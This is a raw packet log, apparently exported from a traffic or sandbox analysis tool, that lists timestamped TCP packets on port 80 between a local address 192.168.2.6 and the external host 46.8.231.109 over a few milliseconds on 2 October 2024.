                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589062929 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589076042 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589092970 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589106083 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589113951 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589117050 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589128017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589138031 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589139938 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589150906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589159966 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589164019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589175940 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589209080 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589448929 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589459896 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589471102 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589482069 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589492083 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589500904 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589512110 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589518070 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589524984 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589534998 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589545965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589551926 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589555979 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589569092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589575052 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589581013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589591980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589591980 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589603901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589613914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589618921 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589624882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589636087 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589647055 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589653015 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589668989 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.589689970 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590054035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590065956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590075970 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590085983 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590096951 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590099096 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590107918 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590121031 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590122938 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590132952 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590143919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590146065 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590154886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590162039 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590167999 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590177059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590178013 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590188026 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590204000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590204954 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590215921 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590230942 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590245962 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590481043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590492964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590503931 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590523005 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590549946 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590675116 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590706110 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590717077 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590728045 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590739012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590744972 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590750933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590761900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590771914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590779066 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590783119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590795040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590797901 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590806961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590814114 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590817928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590828896 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590830088 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590842962 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590856075 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590859890 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590867996 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590878963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590888977 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590893984 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590898991 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590910912 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590915918 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590924025 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590931892 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590934992 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590946913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590950012 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590959072 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590974092 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.590996981 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591506004 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591519117 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591530085 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591540098 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591550112 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591559887 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591567039 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591571093 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591588020 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591592073 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591598988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591609001 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591609955 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591619015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591636896 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591638088 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591650963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591660023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591666937 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591670990 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591681004 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591681004 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591696024 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591696024 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591707945 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591717958 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591721058 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591728926 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591738939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591748953 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591754913 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591758966 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591769934 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591772079 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591782093 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591793060 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591799021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591804028 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591809988 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591816902 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591826916 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591842890 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.591872931 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592539072 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592550039 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592561960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592572927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592581987 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592582941 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592592955 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592609882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592616081 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592617989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592624903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592636108 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592643976 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592653036 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592658043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592664957 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592674971 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592674971 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592685938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592696905 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592699051 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592709064 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592711926 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592720032 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592730999 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592742920 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592742920 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592746973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592770100 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592792988 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592833042 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592844009 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592869043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.592881918 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593420982 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593432903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593444109 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593455076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593465090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593466043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593477964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593486071 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593491077 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593511105 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593521118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593523026 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593534946 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593540907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593548059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593555927 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593559027 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593570948 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593580961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593584061 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593590021 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593600035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593610048 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593611002 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593621969 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593625069 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593636990 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593647957 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593648911 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593658924 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593667984 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593677044 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593677998 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593691111 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593693972 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593702078 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593713045 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593717098 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593724012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593735933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593736887 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593765020 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.593776941 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594444990 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594456911 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594465971 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594476938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594486952 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594491005 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594497919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594508886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594508886 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594527960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594538927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594541073 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594549894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594559908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594564915 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594569921 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594580889 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594583035 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594592094 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594604015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594611883 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594613075 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594624996 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594635963 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594639063 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594650984 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594651937 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594662905 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594674110 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594680071 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594688892 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594698906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594698906 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594707012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594712973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594717026 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594721079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594728947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594734907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594754934 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.594768047 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.595128059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.595168114 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.595340014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.595351934 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.595361948 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.595372915 CEST805851546.8.231.109192.168.2.6
